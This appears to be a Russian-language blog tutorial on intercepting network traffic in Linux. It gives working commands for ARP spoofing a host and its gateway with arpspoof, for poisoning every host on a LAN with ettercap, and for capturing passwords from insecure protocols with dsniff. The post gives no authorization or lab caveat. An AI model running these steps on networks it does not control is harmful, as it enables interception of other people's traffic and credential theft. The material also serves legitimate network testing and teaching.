перехват трафика в Linux

Thank you for reading this post, don't forget to subscribe!

Dsniff – один из наиболее полных и мощных свободно распространяемых наборов инструментов для перехвата и обработки аутентификационной информации.

Его функциональность и многочисленные утилиты сделали его распространенным инструментом, используемым злоумышленниками для перехвата паролей и аутентификационной информации из сетей.

Сетевой коммутатор не передает пакеты всем в сети так же, как сетевой концентратор, и поэтому теоретически человек в сети не может просматривать чужой трафик.

Однако есть способы преодолеть эту проблему, которые заключаются в выполнении подмены arp.

Dsniff

В этой статье мы просто обсудим, как это делается, без обсуждения теории, стоящей за этим процессом.

Для начала необходимо установить необходимую программу, в данном случае это пакет dsniff, который содержит программу arpspoof, которая нам нужна.

В Ubuntu или любом другом дистрибутиве на базе Debian он устанавливается с помощью команды apt-get, как показано ниже;

Установка (Ubuntu)

sudo apt-get install dsniff

Включении переадресации IP-адресов

Чтобы убедиться, что трафик перенаправляется в реальный пункт назначения, когда он достигает нашей машины, необходимо выполнить следующую команду;

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Выполним спуфинг ARP

Следующая команда скажет шлюзу “Я – 192.168.0.100”, а следующая команда скажет 192.168.0.100 “Я – шлюз”.

sudo arpspoof 192.168.0.100 -t 192.168.0.1

sudo arpspoof 192.168.0.1 -t 192.168.0.100

Таким образом, весь трафик, который должен идти на шлюз с машины и наоборот, будет сначала проходить через нашу машину, а только потом направляться к реальной цели.

Ettercap

Однако существуют программы, позволяющие упростить весь процесс.

Одной из самых популярных программ для этого является ettercap.

Ettercap может выполнять спуфинг arp, а также многое другое.

В Ubuntu пакет называется ettercap-gtk;

Установка (Ubuntu)

$ sudo apt-get install ettercap-gtk

1	$ sudo apt-get install ettercap-gtk

Запуск спуфинга ARP (графический интерфейс пользователя)

Запуск программы с ключом -G запустит ее в GTK, а не в ncurses.

sudo ettercap -G

В меню выберите следующее;

Sniff -&gt; Unfied sniffing

1	Sniff -> Unfied sniffing

И в подсказке выберите сетевой интерфейс, который будет использоваться.

Обычно это eth0

Network Interface: eth0

1	Network Interface: eth0

В новом меню выберите следующее, чтобы добавить в список все хосты в сети

Hosts -&gt; Scan for hosts

1	Hosts -> Scan for hosts

Следующие действия выполнят подмену arp для всех в сети.

Mitm -&gt; Arp poisoning -&gt; Ok
Start -&gt; Start sniffing

1 2	Mitm -> Arp poisoning -> Ok Start -> Start sniffing

Выполним спуфинг ARP

Следующая команда выполнит то же самое, что и в примере выше, за одну команду;

sudo ettercap -q -T -M arp // //

1	sudo ettercap -q -T -M arp // //

Примеры команд dsniff

1. Для мониторинга сети на наличие небезопасных протоколов:

# dsniff -m [-i interface] [-s snap-length] [filter-expression]

1	# dsniff -m [-i interface] [-s snap-length] [filter-expression]

2. Чтобы сохранить результаты в базе данных, а не выводить их:

# dsniff -w gotcha.db [other options...]

1	# dsniff -w gotcha.db [other options…]

3. Чтение и вывод результатов из базы данных:

# dsniff -r gotcha.db

1	# dsniff -r gotcha.db

Пн	Вт	Ср	Чт	Пт	Сб	Вс
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

Centos

перехват трафика в Linux

Dsniff

Установка (Ubuntu)

Включении переадресации IP-адресов

Ettercap

Установка (Ubuntu)

Запуск спуфинга ARP (графический интерфейс пользователя)

Выполним спуфинг ARP

Примеры команд dsniff

https://github.com/midnight47/